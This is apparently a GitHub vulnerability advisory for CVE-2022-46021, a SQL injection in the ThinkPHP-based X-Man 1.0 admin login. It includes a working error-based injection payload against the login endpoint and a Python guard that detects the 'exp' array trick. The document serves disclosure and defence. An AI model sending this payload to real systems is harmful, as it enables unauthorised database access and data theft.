CVE-2022-46021: GitHub - Howard512966/x-man-injection: x-man injection

X-Man 1.0 has a SQL injection vulnerability, which can cause data leakage.

Latest commit: Update README.md (January 6, 2023 03:06)

README.md

X-Man is a back-office (admin) system built on the ThinkPHP framework. Because it does not follow the ThinkPHP framework development standard, its login handler contains a SQL injection vulnerability.

PoC: http://ip/admin/login/check

POST: para=username[0]%3Dexp%26username[1]%3D=11 and(select extractvalue(1,concat(0x7e,(select database()))))%26password%3D213%26token%3D

Example:

Analysis: https://github.com/imxiny/x-man/blob/master/Application/Admin/Controller/LoginController.class.php

The parameter read at line 60 is not filtered, so a SQL injection PoC can be built against the ThinkPHP framework.
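As an added illustration (not code from the X-Man project or from this advisory), the Python guard below decodes a PHP-style form body of the shape used in the PoC and rejects a login field that arrives as a ThinkPHP `exp` array instead of a scalar; the field names and the `para` wrapper are assumptions taken from the PoC, and the inner expression in the sample is a harmless constructed placeholder.

```python
import re
from urllib.parse import parse_qsl

# ThinkPHP 3.x splices a where() value shaped like ['exp', '<text>'] into the
# SQL as a raw expression, so a login handler that passes the posted username
# to where() unchanged is injectable once the client turns that field into an
# array (username[0]=exp&username[1]=...), which is the shape of the PoC.
# This request-level guard rejects that shape; the durable fix is to never
# pass client-supplied arrays into where(). Field names are assumptions.
LOGIN_FIELDS = ("username", "password", "token")
BRACKET_KEY = re.compile(r"([^\[\]]+)\[([^\]]*)\]")

def php_form_to_dict(body: str) -> dict:
    """Decode a URL-encoded body the way PHP does for one level of a[i]=v keys."""
    out: dict = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = BRACKET_KEY.fullmatch(key)
        if m is None:                      # plain scalar field
            out[key] = value
            continue
        base, index = m.groups()
        arr = out.get(base)
        if not isinstance(arr, dict):      # PHP: a later a[i] replaces a scalar a
            arr = out[base] = {}
        arr[index if index else str(len(arr))] = value   # a[]=v appends
    return out

def validate_login(body: str) -> tuple:
    """Return (accepted, reason) for a POST body to the login check.
    Assumes, as in the PoC, that the real form is nested inside a single
    `para` field; a body without `para` is treated as the form itself."""
    outer = dict(parse_qsl(body, keep_blank_values=True))
    form = php_form_to_dict(outer.get("para", body))
    for field in LOGIN_FIELDS:
        value = form.get(field)
        if value is None:
            return False, f"{field}: missing"
        if isinstance(value, dict):        # array where a scalar is expected
            if value.get("0", "").lower() == "exp":
                return False, f"{field}: ThinkPHP 'exp' expression injection"
            return False, f"{field}: array where scalar expected"
    return True, "ok"

# Constructed sample bodies: a normal login and the PoC's shape with a
# harmless placeholder expression in place of the real payload.
BENIGN_BODY = "para=username%3Dalice%26password%3Ds3cret%26token%3Dabc"
INJECTED_BODY = ("para=username[0]%3Dexp%26username[1]%3D%3D1%20and%201%3D1"
                 "%26password%3D213%26token%3D")
```

The same check can run in a WAF rule or in the controller before the model layer is touched; matching only on `exp` is deliberate, since that is the operator ThinkPHP treats as raw SQL.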
